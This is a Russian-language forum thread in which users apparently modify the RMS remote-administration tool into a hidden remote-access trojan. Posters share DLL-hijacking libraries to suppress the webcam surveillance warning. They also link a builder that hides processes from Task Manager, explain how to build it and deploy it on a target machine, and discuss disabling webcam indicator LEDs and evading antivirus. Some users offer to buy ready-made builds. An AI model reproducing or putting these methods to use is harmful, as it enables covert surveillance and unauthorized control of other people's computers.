Скрытый RMS [удаленное администрирование]

Тема в разделе "Самое важное", создана пользователем sawyer1992, 25 фев 2011.

1. sv9t
    sv9t Новичок
    Симпатии:
    0
    Mr.Burns, в версии 5.4 не работает msimg32.zip

29 янв 2013
  2. shurokenn
    shurokenn Новичок
    Симпатии:
    0
    народ привет, где можно скачать актуальный архиф - иначе выходит rms-защита сервера пароль?

1 фев 2013
  3. Mr.Burns
    Mr.Burns местная мразь Продвинутый
    Симпатии:
    62
    ога, из импорта рутсерва эта библиотека исчезла.

всё так же - закинуть в папку с рмс

Вложения:

• winmm.zip
      Размер файла:
      6,6 КБ
      Просмотров:
      326
    1 фев 2013
  4. subor
    subor Новичок
    Симпатии:
    1
    Странно. Почему у меня работает...

1 фев 2013
  5. Mr.Burns
    Mr.Burns местная мразь Продвинутый
    Симпатии:
    62
    на самой последней версии не работает. если у вас работает - не факт что у конченого конечного юзера тоже заработает.

пользуйтесь winmm.

3 фев 2013
  6. sv9t
    sv9t Новичок
    Симпатии:
    0
    Все отлично работает, спасибо, Mr.Burns! обожаю все новое и чтоб работало как нам надо ))

ЗЫ увы, баллов у меня нет, добавить рейтинг нечем

6 фев 2013
  7. sarov1324
    sarov1324 Новичок
    Симпатии:
    0
    Куплю готовую сборку. Стучите в аську :)

8 фев 2013
  8. scandalist
    scandalist Новичок
    Симпатии:
    3
    Как пообещал на офиц. форуме разработчик RMS дырка с dll-hijaking будет прикрыта в ближайшей версии, импорт сделают по абсолютным путям. Также раздумывают над CRC32/Hash проверкой файлов сервера чтобы предотвратить модификацию файлов.

8 фев 2013
  9. scalpel
    scalpel Новичок
    Симпатии:
    4
    Да и хрен с ним!Есть другие альтернативы.Тем более заюзан он уже всеми и прописан намертво в антивирусных базах и цифровая подпись бестолку,так что можно патчить напрямую.Кстати вот в тему.
    Билдер для создании сборки.Основан на полученном материале из выловленного и разобранного сегодня семпла,но в новом формате и на последней версии RMC.Делалось просто для того что б отвлечся и ради примера.Генерирует идентификатор по которому можно будет впоследствии подключаться и создает собственно билд.Скрываются процессы в диспетчере задач.Билдер от этого семпла не так давно продавался,я сделал альтернативу.Иконку можите сменить в любом редакторе ресурсов,что то делать дальше с этим мне лень.
    Мой билдер
    http://www.sendspace.com/file/mg11dn
    Видео от автора оригинального билдера
    http://www.sendspace.com/file/lii41d

Последнее редактирование: 10 фев 2013
    9 фев 2013
  10. sarov1324
    sarov1324 Новичок
    Симпатии:
    0
    чот он критует хD

10 фев 2013
  11. scalpel
    scalpel Новичок
    Симпатии:
    4
    Oбъясняю.Запускаем builder.exe,генерируем идентификатор,затем жмем на кнопку
    build,образуются 2 файла build.exe c нужными файлами и текстовой файлик ID+PASS.txt в котором ид для подключения и пасс для подключения.Потом запускаем на нужной машине файл build.exe и подключаемся клиентом через ид и пасс что в
    ID+PASS.txt.Запароленный архив sysfiles.7z с нужными файлами включается в build.exe и распаковывается во время запуска.Пароль передается архиватору через командную стоку.Если хотите посмотреть что внутри то пасс 1234 и указан в build.nsi.Только для каждой машины нужно генерировать свой идентификатор.

10 фев 2013
  12. scalpel
    scalpel Новичок
    Симпатии:
    4
    "Билдер" выдавал ошибку на 64 битной 7.Исправил и перезалил

10 фев 2013
  13. 4ekkk
    4ekkk Новичок
    Симпатии:
    7
    На х64 битной винде процессы не скрывает(

11 фев 2013
  14. scalpel
    scalpel Новичок
    Симпатии:
    4
    Это вопрос не ко мне,а к разрабу.Файлы по скрытию процессов были выдраны из семпла.А билдер,это лишь надстройка над компилятором нсиса,для автоматизации процесса.Семпл был сделан Inno Setup,внутри батники и файл реестра,который создавался билдером разраба.Там такая же надстройка,для тех кто умеет нажимать только кнопки.
    Его тема по прежнему в бесплатных объявлениях на hpc.name.Осуществляется перехват ZwQuerySystemInformation во всех
    оконных процессах.Способ давно избитый и известный и прибавляет еще больше палева перед проактивками.

Последнее редактирование: 11 фев 2013
    11 фев 2013
  15. 3nigmus
    3nigmus Guest
    жаль что камера, хоть и слабо, но вспыхивает

11 фев 2013
  16. scalpel
    scalpel Новичок
    Симпатии:
    4
    Для сокрытия предупреждения о видеонаблюдении была включена дллка от Mr.Burns.Сам я не тестил,поэтому ничего сказать не могу.Для замены распакуйте файлы из архива sysfiles.7z,пасс там 1234,затем упакуйте 7z архиватором заново,название папки "sysfiles" должно остаться неизменным.Медод сжатия для максимальной компрессии lzma2,уровень ультра.Пасс укажите тот же самый,или какой другой,но тогда нужно будет изменить в файле build.nsi вот эту строчку nsExec::Exec '"7z.exe" x -p1234 sysfiles.7z',где -p1234 после -p укажите свой пасс.

11 фев 2013
  17. sv9t
    sv9t Новичок
    Симпатии:
    0
    я тестил, на ХР sp3, vista, win7 начальная все работает.

А кто может подсказать, обсуждается ли где тема по отключению светодиода у веб камер различных производителей?

12 фев 2013
  18. scalpel
    scalpel Новичок
    Симпатии:
    4
    Это фантастика!Представь сколько производителей,это раз.Нужно дебажить у каждого драйвер,искать как это можно изменить и писать свой драйвер.Так что забудь об этом.

12 фев 2013
  19. sv9t
    sv9t Новичок
    Симпатии:
    0
    согласен, что много всех производителей, но покупают в основном самых известных, а их самое большее 20. Из этих 20 можно отключить или в дайвере или в реестре половину, в остальных только разбить лампочку))
    Так что их будет на самом деле мало...

12 фев 2013
  20. scalpel
    scalpel Новичок
    Симпатии:
    4
    Если все так просто,так займись этим!Я сомневаюсь,что ты встретишь подобное в паблике.Только не надо говорить,я не знаю,не понимаю,я не кодер.Учись.

12 фев 2013
Загрузка...